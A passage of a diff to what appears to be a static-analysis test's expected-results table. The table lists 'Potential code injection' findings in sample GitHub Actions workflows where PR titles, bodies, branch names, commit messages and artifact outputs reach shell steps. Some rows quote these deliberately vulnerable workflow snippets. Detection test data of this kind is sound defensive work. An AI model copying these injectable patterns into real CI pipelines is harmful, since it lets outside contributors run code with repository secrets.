.github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | -| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | -| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | -| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | -| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | -| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | -| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | -| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | -| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | -| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | -| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | -| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | -| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | -| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | -| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | -| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | -| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | -| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | -| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | -| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | -| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | -| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | -| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | -| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | -| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | -| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | -| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | .github/workflows/composite-action-caller-1.yml | +| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | .github/workflows/argus_case_study.yml | +| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning1.yml | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning2.yml | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning3.yml | +| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning4.yml | +| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning5.yml | +| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | +| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | 